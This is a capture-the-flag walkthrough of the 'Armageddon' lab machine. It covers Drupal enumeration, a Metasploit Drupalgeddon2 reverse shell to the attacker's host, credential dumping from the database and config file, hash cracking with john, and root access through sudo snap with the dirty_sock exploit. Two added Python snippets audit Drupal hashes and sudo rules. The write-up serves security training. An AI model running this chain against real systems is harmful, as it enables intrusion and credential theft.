Armageddon


Summary:

Armageddon is a Linux machine (surprise, surprise) which hosts Drupal 7, an open source content management system. The installed version is vulnerable to a plethora of exploits, so gaining a foothold is straightforward: exploiting a remote code execution vulnerability provides it. Privilege escalation to user required dumping credentials from a table within the application's MySQL database. Gaining root introduced a new way (for me) to escalate privileges with the snap binary. All in all, a pretty fun box.

Enumeration

Service Scan

The service scan reveals two open ports. A web application is running on port 80, and its robots.txt lists interesting directories to check. Additionally, we see Drupal 7 running, which gives us somewhat of a direction.

# nmap -sC -sV -p-65535 armageddon
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 04:58 EDT
Nmap scan report for armageddon (10.10.10.233)
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.82 seconds

Droopescan

I thought to google Drupal scanners and found a tool on GitHub called droopescan.

# ./droopescan scan drupal -u http://armageddon
[+] Plugins found:                                                              
    profile http://armageddon/modules/profile/
    php http://armageddon/modules/php/
    image http://armageddon/modules/image/

[+] Themes found:
    seven http://armageddon/themes/seven/
    garland http://armageddon/themes/garland/

[+] Possible version(s):
    7.56

[+] Possible interesting urls found:
    Default changelog file - http://armageddon/CHANGELOG.txt

[+] Scan finished (0:01:07.454052 elapsed)

Searchsploit

Further internet searches on the applicable exploits led me to Drupalgeddon, which I will try out in the next stage.

$ searchsploit drupal                    
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.0 - News Message HTML Injection                                                                            | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting                                                                               | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection                                                                       | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                                         | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                                       | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector                                                                             | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service                                                                                | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                              | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                                                   | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                                                    | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                                         | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                                         | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                                            | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                                              | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                                                  | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                                             | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution                                                               | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                                       | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                                                   | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                                            | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                                         | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution                                 | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)                             | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)                                    | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)               | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution                                                      | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution                                                                  | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                                                   | php/webapps/44501.txt
Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections                                                      | php/webapps/32415.txt
Drupal Module CAPTCHA - Security Bypass                                                                             | php/webapps/35335.html
Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting                                   | php/webapps/18389.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting                              | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)                                                     | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                                       | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                                             | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                                      | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities        | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                                                   | php/remote/40130.rb
Drupal Module Sections - Cross-Site Scripting                                                                       | php/webapps/10485.txt
Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection                                                             | php/webapps/33410.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit

metasploit drupalgeddon2

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 10.10.10.233
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.233:41324) at 2021-06-08 06:09:47 -0400
meterpreter > sysinfo                                                                                                                                 
Computer    : armageddon.htb                                                                                                                          
OS          : Linux armageddon.htb 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64                                              
Meterpreter : php/linux                                                                                                                               

Privilege Escalation

There are a couple of directories under /var/www/html. After traversing the files, I discovered a config file, sites/default/settings.php, which contains a database username and password. I also uploaded some privesc tools such as unix-privesc-check and LinEnum using Meterpreter's upload functionality.

ls
authorize.php  cron.php   INSTALL.mysql.txt  INSTALL.sqlite.txt  linenum.sh       modules   README.txt  sites               update.php     web.config
CHANGELOG.txt  includes   INSTALL.pgsql.txt  INSTALL.txt         MAINTAINERS.txt  out.txt   robots.txt  themes              UPGRADE.txt    xmlrpc.php
COPYRIGHT.txt  index.php  install.php        LICENSE.txt         misc             profiles  scripts     unix-privesc-check
cat sites/default/settings.php
<deleted>
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => '<edited>',
      'username' => '<edited>',
      'password' => '<edited>',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
<deleted>

Next, I use the credentials to log in to the Drupal database and enumerate its tables. Then I dump the users table from the database 'drupal'. Finally, analysing the dump file reveals the password hash for brucetherealadmin.

mysql -u drupaluser -p -D drupal -e 'show tables;'

<deleted> 

users

<deleted>

mysqldump -u drupaluser -p drupal users > usersdump.sql

cat usersdump.sql

<deleted>
(1,'brucetherealadmin','$S$DgL2gjv<edited>','[email protected]','','','filtered_html',1606998756,1607077194,1607076276,1,'Europe/London','',0,'[email protected]','a:1:{s:7:\"overlay\";i:1;}'),
<deleted>

Cracking the hash with john was easy and straightforward.

john forjohn -w /usr/share/wordlists/rockyou.txt

$ cat /home/kali/.john/john.pot
$S$DgL2gjv<spoil>:b<edited>
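The brucetherealadmin entry is a Drupal 7 `$S$` hash: the character after `$S$` encodes the SHA-512 round count (the `D` above means 2^15 rounds), followed by an 8-character salt. The Python below is an added example, not code from the original writeup; it reimplements Drupal 7's phpass-style scheme (as in password.inc) so a defender can read off the work factor of dumped hashes or verify a password offline. The salt, round count and passwords it uses are constructed for the demo.

```python
import hashlib
import hmac
import os

# Alphabet and default work factor used by Drupal 7's password.inc (phpass-style).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_COUNT = 15          # 2**15 SHA-512 rounds; the 'D' in $S$D... encodes this
DRUPAL_HASH_LENGTH = 55         # stored hashes are truncated to 55 characters

def _encode64(data: bytes) -> str:
    """phpass base64 variant: 6-bit groups, little-endian, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def rounds(hash_or_setting: str) -> int:
    """Number of SHA-512 iterations encoded in the 4th character of a $S$ hash."""
    return 1 << ITOA64.index(hash_or_setting[3])

def drupal7_crypt(password: str, setting: str) -> str:
    """Recompute a Drupal 7 $S$ hash for `password` under the salt and cost in `setting`."""
    setting = setting[:12]                       # '$S$' + cost char + 8-char salt
    salt = setting[4:12].encode()
    h = hashlib.sha512(salt + password.encode()).digest()
    for _ in range(rounds(setting)):
        h = hashlib.sha512(h + password.encode()).digest()
    return (setting + _encode64(h))[:DRUPAL_HASH_LENGTH]

def new_hash(password: str, count_log2: int = DRUPAL_HASH_COUNT) -> str:
    """Hash a new password with a random 6-byte salt (constructed, not from the box)."""
    setting = "$S$" + ITOA64[count_log2] + _encode64(os.urandom(6))
    return drupal7_crypt(password, setting)

def verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored $S$ hash."""
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)
```

The 32768 rounds make every guess cost 32768 SHA-512 calls, which is why rockyou-sized dictionaries still finish: the cost multiplies a small number of guesses, so password strength, not the hash, is what failed here.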

I remembered there is an SSH service running, so I tried logging into it.

# ssh [email protected]                             
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[[email protected] ~]$ 

I discovered that the snap binary can be run through sudo as root without a password.

[email protected] ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
    LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
    LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
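A rule like this is easy to miss in a large sudoers file, so it is worth auditing `sudo -l` output automatically. The Python below is an added example, not part of the original writeup: it parses the rule section of `sudo -l` (using a constructed sample modelled on the output above) and flags entries that run as root without a password, with wildcard arguments, or through a package installer such as snap, where installing a local package executes its hooks as root.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the layout of the sudo -l output above (Defaults shortened).
SAMPLE_SUDO_L = """\
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, env_reset, secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
    (root) /usr/bin/systemctl restart httpd
"""
# Installers whose "install <local file>" runs package hooks as root; snap is the one
# on this page (GTFOBins lists it). Extend the set from GTFOBins for your own hosts.
LOCAL_PACKAGE_INSTALLERS = {"/usr/bin/snap"}
# Rule line layout: (runas) [TAG: ...] /path/to/binary args...
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S+)\s*(?P<args>.*)$")

@dataclass
class Finding:
    runas: str
    binary: str
    args: str
    nopasswd: bool
    reasons: list = field(default_factory=list)

    @property
    def severity(self) -> str:
        return {0: "info", 1: "medium"}.get(len(self.reasons), "high")

def audit_sudo_l(text: str) -> list:
    """Parse `sudo -l` output and flag rules that hand out root too cheaply."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True            # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        runas = m["runas"].split(":")[0].strip()   # "(root)" or "(root : root)"
        f = Finding(runas, m["cmd"], m["args"].strip(), "NOPASSWD" in tags)
        if f.nopasswd:
            f.reasons.append("NOPASSWD: no authentication before running as " + runas)
        if "*" in f.args or not f.args:
            f.reasons.append("wildcard or missing argument restriction")
        if runas in ("root", "ALL") and f.binary in LOCAL_PACKAGE_INSTALLERS and "install" in f.args:
            f.reasons.append("local package install executes package hooks as root")
        findings.append(f)
    return findings
```

The fix on the sudoers side is to drop the wildcard and NOPASSWD, or better, to not delegate package installation to an unprivileged account at all.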

A little research on snap points to GTFOBins solutions to the problem.

  1. Tried https://gtfobins.github.io/gtfobins/snap/ but did not work.
  2. A bit additional research reveals https://github.com/initstring/dirty_sock

I followed the steps from '2' and it did not work; it seems the Python version was incorrect. So I copied the source code of the exploit, pasted it into a new file and ran it with the correct Python version.

[[email protected] tmp]$ ls
ds2.py     systemd-private-a2763202598b48bcb69371e110e1c4e7-httpd.service-bwuFlM
id_rsa     systemd-private-a2763202598b48bcb69371e110e1c4e7-mariadb.service-DFOvzD
dirty.snap
[[email protected] tmp]$ sudo /usr/bin/snap install --devmode dirty.snap 
dirty-sock 0.1 installed
[[email protected] tmp]$ su dirty_sock
Password: 
[[email protected] tmp]$ whoami
dirty_sock
[[email protected] tmp]$ 
[[email protected] tmp]$ sudo -i

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for dirty_sock: 
[[email protected] ~]# whoami
root
[[email protected] ~]# 
